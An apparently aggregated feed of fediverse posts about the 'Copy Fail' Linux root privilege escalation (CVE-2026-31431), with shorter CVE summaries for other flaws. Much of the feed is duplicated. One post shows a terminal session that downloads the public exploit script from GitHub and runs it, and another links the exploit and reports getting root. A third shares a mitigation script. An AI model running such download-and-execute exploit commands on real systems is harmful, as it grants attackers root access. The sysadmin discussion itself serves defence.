You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

https://copy.fail

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://ubuntu.com/security/CVE-2026-31431

https://www.suse.com/security/cve/CVE-2026-31431.html

#copyfail

##

jschauma@mstdn.social at 2026-04-29T19:42:35.000Z ##

Ooooh, nice:

https://xint.io/blog/copy-fail-linux-distributions

CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.

#CopyFail

##

hackersnews@mastodon.cesium.pw at 2026-04-29T19:30:26.000Z ##

Copy Fail – CVE-2026-31431
https://news.ycombinator.com/item?id=47952181

#hackernews #tech

##

giggls@karlsruhe-social.de at 2026-04-29T19:17:23.000Z ##

Hm https://security-tracker.debian.org/tracker/CVE-2026-31431

##

hn100@social.lansky.name at 2026-04-29T19:05:10.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

newsycombinator@framapiaf.org at 2026-04-29T19:00:11.000Z ##

Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Comments: https://news.ycombinator.com/item?id=47952181

##

hackernewsdaily@bsd.cafe at 2026-04-29T19:00:08.000Z ##

📰 Today's Top 21 Hacker News Stories (Sorted by Score) 📰
----------------------------------------
🔖 Title: Ghostty is leaving GitHub
🔗 URL: https://mitchellh.com/writing/ghostty-leaving-github
👍 Score: [3244]
💬 Discussion: https://news.ycombinator.com/item?id=47939579
----------------------------------------
🔖 Title: Zed 1.0
🔗 URL: https://zed.dev/blog/zed-1-0
👍 Score: [1012]
💬 Discussion: https://news.ycombinator.com/item?id=47949027
----------------------------------------
🔖 Title: Bugs Rust won't catch
🔗 URL: https://corrode.dev/blog/bugs-rust-wont-catch/
👍 Score: [565]
💬 Discussion: https://news.ycombinator.com/item?id=47943499
----------------------------------------
🔖 Title: Soft launch of open-source code platform for government
🔗 URL: https://www.nldigitalgovernment.nl/news/soft-launch-for-government-open-source-code-platform/
👍 Score: [456]
💬 Discussion: https://news.ycombinator.com/item?id=47945918
----------------------------------------
🔖 Title: We need a federation of forges
🔗 URL: https://blog.tangled.org/federation/
👍 Score: [413]
💬 Discussion: https://news.ycombinator.com/item?id=47948603
----------------------------------------
🔖 Title: Online age verification is the hill to die on
🔗 URL: https://x.com/GlennMeder/status/2049088498163216560
👍 Score: [407]
💬 Discussion: https://news.ycombinator.com/item?id=47950091
----------------------------------------
🔖 Title: Mistral Medium 3.5
🔗 URL: https://mistral.ai/news/vibe-remote-agents-mistral-medium-3-5
👍 Score: [263]
💬 Discussion: https://news.ycombinator.com/item?id=47949642
----------------------------------------
🔖 Title: Cursor Camp
🔗 URL: https://neal.fun/cursor-camp/
👍 Score: [148]
💬 Discussion: https://news.ycombinator.com/item?id=47949939
----------------------------------------
🔖 Title: FastCGI: 30 years old and still the better protocol for reverse proxies
🔗 URL: https://www.agwa.name/blog/post/fastcgi_is_the_better_protocol_for_reverse_proxies
👍 Score: [118]
💬 Discussion: https://news.ycombinator.com/item?id=47950510
----------------------------------------
🔖 Title: Third Editor Fired in Elsevier's Citation Cartel Crackdown
🔗 URL: https://www.chrisbrunet.com/p/third-editor-fired-in-elseviers-citation
👍 Score: [101]
💬 Discussion: https://news.ycombinator.com/item?id=47950022
----------------------------------------
🔖 Title: Letting AI play my game – building an agentic test harness to help play-testing
🔗 URL: https://blog.jeffschomay.com/letting-ai-play-my-game
👍 Score: [98]
💬 Discussion: https://news.ycombinator.com/item?id=47947525
----------------------------------------
🔖 Title: Linux 7.0 Broke PostgreSQL: The Preemption Regression Explained
🔗 URL: https://read.thecoder.cafe/p/linux-broke-postgresql
👍 Score: [95]
💬 Discussion: https://news.ycombinator.com/item?id=47949585
----------------------------------------
🔖 Title: Copy Fail – CVE-2026-31431
🔗 URL: https://copy.fail/
👍 Score: [93]
💬 Discussion: https://news.ycombinator.com/item?id=47952181
----------------------------------------
🔖 Title: Maryland becomes first state to ban surveillance pricing in grocery stores
🔗 URL: https://www.theguardian.com/technology/2026/apr/29/maryland-grocery-stores-ban-surveillance-pricing
👍 Score: [90]
💬 Discussion: https://news.ycombinator.com/item?id=47951007
----------------------------------------
🔖 Title: GitHub – DOS 1.0: Transcription of Tim Paterson's DOS Printouts
🔗 URL: https://github.com/DOS-History/Paterson-Listings
👍 Score: [85]
💬 Discussion: https://news.ycombinator.com/item?id=47946813
----------------------------------------
🔖 Title: An open-source stethoscope that costs between $2.5 and $5 to produce
🔗 URL: https://github.com/GliaX/Stethoscope
👍 Score: [81]
💬 Discussion: https://news.ycombinator.com/item?id=47949204
----------------------------------------
🔖 Title: Improving ICU handovers by learning from Scuderia Ferrari F1 team
🔗 URL: https://healthmanagement.org/c/icu/IssueArticle/improving-handovers-by-learning-from-scuderia-ferrari
👍 Score: [46]
💬 Discussion: https://news.ycombinator.com/item?id=47947834
----------------------------------------
🔖 Title: Laws of UX
🔗 URL: https://lawsofux.com/
👍 Score: [37]
💬 Discussion: https://news.ycombinator.com/item?id=47951137
----------------------------------------
🔖 Title: Ramp's Sheets AI Exfiltrates Financials
🔗 URL: https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials
👍 Score: [31]
💬 Discussion: https://news.ycombinator.com/item?id=47951786
----------------------------------------
🔖 Title: How to Build the Future: Demis Hassabis [video]
🔗 URL: https://www.youtube.com/watch?v=JNyuX1zoOgU
👍 Score: [31]
💬 Discussion: https://news.ycombinator.com/item?id=47948664
----------------------------------------
🔖 Title: Show HN: A new benchmark for testing LLMs for deterministic outputs
🔗 URL: https://interfaze.ai/blog/introducing-structured-output-benchmark
👍 Score: [26]
💬 Discussion: https://news.ycombinator.com/item?id=47950283
----------------------------------------

##

hn50@social.lansky.name at 2026-04-29T18:45:06.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

hnbot@chrispelli.fun at 2026-04-29T18:25:05.000Z ##

Copy Fail – CVE-2026-31431 - https://copy.fail/

#hackernews

##

h4ckernews@mastodon.social at 2026-04-29T18:24:09.000Z ##

Copy Fail – CVE-2026-31431

https://copy.fail/

#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews

##

tankgrrl@hachyderm.io at 2026-04-30T02:46:20.000Z ##

Joker voice: Just wait 'til malicious agents and oberly aggressive users get a load of CVE-2026-31431

##

tankgrrl@hachyderm.io at 2026-04-30T02:40:15.000Z ##

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

##

poundquerydotinfo@virctuary.com at 2026-04-30T02:34:47.000Z ##

CopyFail results:

On Debian 12 (6.1.158 kernel) PoC didn't seem to work, I got prompted for a password.

On Debian 14 (6.18.5 kernel) got dropped right into a root prompt.

So this is very real. Yikes.

Proof of concept: https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

Write up: https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342

##

thesamesam@treehouse.systems at 2026-04-30T01:06:03.000Z ##

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

##

hn500@social.lansky.name at 2026-04-30T00:35:11.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

linux@activitypub.awakari.com at 2026-04-29T20:24:43.000Z ## Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...

#r/sysadmin

Origin | Interest | Match ##

adamw@fosstodon.org at 2026-04-29T23:39:24.000Z ##

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/refs/heads/main/copy_fail_exp.py
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

##

yukotan.bsky.social@bsky.brid.gy at 2026-04-29T23:25:16.858Z ##

全てのディストリで影響があるゼロデイの脆弱性が見つかったそうです。特権昇格が可能です。 Copy Fail — CVE-2026-31431 copy.fail

Copy Fail — 732 Bytes to Root

##

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

obivan@infosec.exchange at 2026-04-29T22:43:47.000Z ##

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 https://copy.fail/

##

roens@hachyderm.io at 2026-04-29T22:32:13.000Z ##

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

https://copy.fail/

##

marshray@infosec.exchange at 2026-04-29T22:21:07.000Z ##

This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb@infosec.exchange at 2026-04-29T22:15:16.000Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB https://secdb.nttzen.cloud/cve/detail/CVE-2026-31431

#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel

##

ajuvo@chaos.social at 2026-04-29T22:01:27.000Z ##

https://security-tracker.debian.org/tracker/CVE-2026-31431

##

cR0w@infosec.exchange at 2026-04-29T21:55:48.000Z ##

@krypt3ia @Viss https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

##

sambowne@infosec.exchange at 2026-04-29T21:46:01.000Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation https://copy.fail/

##

geheimorga@chaos.social at 2026-04-29T21:23:23.000Z ##

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:19:51.000Z ##

https://security-tracker.debian.org/tracker/CVE-2026-31431

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:11:07.000Z ##

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

##

linux@activitypub.awakari.com at 2026-04-29T20:24:43.000Z ## Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...

#r/sysadmin

Origin | Interest | Match ##

hn250@social.lansky.name at 2026-04-29T21:00:11.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

interpipes@thx.gg at 2026-04-29T20:44:26.000Z ##

Hello

I am here to ruin your day again

https://copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

##

Emily@infosec.exchange at 2026-04-29T20:32:32.000Z ##

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

https://access.redhat.com/security/cve/cve-2026-31431

##

Emily@infosec.exchange at 2026-04-29T20:31:18.000Z ##

RE: https://hachyderm.io/@petrillic/116489574280084326

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: https://access.redhat.com/security/cve/cve-2026-31431

##

DerMolly@kif.rocks at 2026-04-29T20:22:15.000Z ##

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

https://copy.fail

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://ubuntu.com/security/CVE-2026-31431

https://www.suse.com/security/cve/CVE-2026-31431.html

#copyfail

##

jschauma@mstdn.social at 2026-04-29T19:42:35.000Z ##

Ooooh, nice:

https://xint.io/blog/copy-fail-linux-distributions

CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.

#CopyFail

##

hackersnews@mastodon.cesium.pw at 2026-04-29T19:30:26.000Z ##

Copy Fail – CVE-2026-31431
https://news.ycombinator.com/item?id=47952181

#hackernews #tech

##

hn100@social.lansky.name at 2026-04-29T19:05:10.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

newsycombinator@framapiaf.org at 2026-04-29T19:00:11.000Z ##

Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Comments: https://news.ycombinator.com/item?id=47952181

##

hn50@social.lansky.name at 2026-04-29T18:45:06.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

h4ckernews@mastodon.social at 2026-04-29T18:24:09.000Z ##

Copy Fail – CVE-2026-31431

https://copy.fail/

#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews

##

CVE-2026-7424
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-29T23:16:20.367000

2 posts

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service (permanent IP task freeze requiring hardware reset) by sending a single crafted DHCPv6 packet. The issue is present whenever DHCPv6 is enabled.

thehackerwire@mastodon.social at 2026-04-29T23:01:45.000Z ##

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7424/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:45.000Z ##

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7424/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7420
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T23:16:20.193000

2 posts

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-29T23:41:10.000Z ##

🟠 CVE-2026-7420 - High (8.8)

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be execu...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7420/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:41:10.000Z ##

🟠 CVE-2026-7420 - High (8.8)

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be execu...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7420/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7419
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T23:16:20.020000

2 posts

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-29T23:40:59.000Z ##

🟠 CVE-2026-7419 - High (8.8)

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation o...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7419/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:40:59.000Z ##

🟠 CVE-2026-7419 - High (8.8)

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation o...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7419/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7418
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T22:16:22.620000

2 posts

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-29T23:00:12.000Z ##

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7418/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:00:12.000Z ##

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7418/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5201
(7.5 HIGH)

EPSS: 0.09%

updated 2026-04-29T22:16:21.667000

1 posts

A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of servi

1 repos

https://github.com/kagancapar/CVE-2026-5201

linux@activitypub.awakari.com at 2026-04-28T03:12:25.000Z ## Oracle Linux 9 gdk-pixbuf2 Important Fix ELSA-2026-10708 CVE-2026-5201 The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:

#Oracle #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-34965
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T21:22:20.120000

2 posts

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via incl

thehackerwire@mastodon.social at 2026-04-29T23:01:26.000Z ##

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-34965/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:26.000Z ##

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-34965/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42515
(0 None)

EPSS: 0.05%

updated 2026-04-29T21:14:23.977000

1 posts

This vulnerability exists in e-Sushrut due to improper access control in resource access validation. An authenticated attacker could exploit this vulnerability by manipulating parameter in the API request URL to gain unauthorized access to sensitive information of patients on the targeted system.

offseq@infosec.exchange at 2026-04-29T09:00:29.000Z ##

New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. https://radar.offseq.com/threat/cve-2026-42515-cwe-639-authorization-bypass-throug-ffcae9ae #OffSeq #Healthcare #CVE #Security

##

CVE-2026-5166
(9.6 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T21:13:30.563000

4 posts

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal. This issue affects Pardus Software Center: before 1.0.3.

offseq at 2026-04-30T03:00:40.812Z ##

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. https://radar.offseq.com/threat/cve-2026-5166-cwe-22-improper-limitation-of-a-path-67023af4 #OffSeq #Vuln #Pardus #Infosec

##

thehackerwire@mastodon.social at 2026-04-29T23:42:00.000Z ##

🔴 CVE-2026-5166 - Critical (9.6)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal.

This issue affects Pardus Software Center: befor...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5166/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-30T03:00:40.000Z ##

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. https://radar.offseq.com/threat/cve-2026-5166-cwe-22-improper-limitation-of-a-path-67023af4 #OffSeq #Vuln #Pardus #Infosec

##

thehackerwire@mastodon.social at 2026-04-29T23:42:00.000Z ##

🔴 CVE-2026-5166 - Critical (9.6)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal.

This issue affects Pardus Software Center: befor...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5166/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-30893
(9.0 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T20:16:29.660000

2 posts

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated cluster peer to write arbitrary files outside the intended extraction directory on other cluster nodes. This can be escalated to code execution in the W

thehackerwire@mastodon.social at 2026-04-29T23:41:47.000Z ##

🔴 CVE-2026-30893 - Critical (9)

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30893/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:41:47.000Z ##

🔴 CVE-2026-30893 - Critical (9)

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30893/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7466
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T19:16:27.013000

2 posts

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers can induce requests to the local AgentFlow API to load and execute existing Python pipeline files on disk, resulting in code execution in the context of

thehackerwire@mastodon.social at 2026-04-29T23:01:36.000Z ##

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7466/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:36.000Z ##

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7466/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0204
(8.0 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:42

2 posts

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

thehackerwire@mastodon.social at 2026-04-29T19:01:06.000Z ##

🟠 CVE-2026-0204 - High (8)

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0204/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T19:01:06.000Z ##

🟠 CVE-2026-0204 - High (8)

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0204/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6849
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:41

2 posts

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

1 repos

https://github.com/osmancanvural/CVE-2026-6849

thehackerwire@mastodon.social at 2026-04-29T19:01:16.000Z ##

🟠 CVE-2026-6849 - High (8.8)

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.

This issue affects Pardus OS My...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6849/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T19:01:16.000Z ##

🟠 CVE-2026-6849 - High (8.8)

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.

This issue affects Pardus OS My...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6849/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5712
(8.0 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:16:05.180000

2 posts

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

thehackerwire@mastodon.social at 2026-04-29T19:00:56.000Z ##

🟠 CVE-2026-5712 - High (8)

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5712/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T19:00:56.000Z ##

🟠 CVE-2026-5712 - High (8)

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5712/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26015
(0 None)

EPSS: 0.00%

updated 2026-04-29T18:16:03.817000

2 posts

DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.

offseq at 2026-04-30T00:00:38.128Z ##

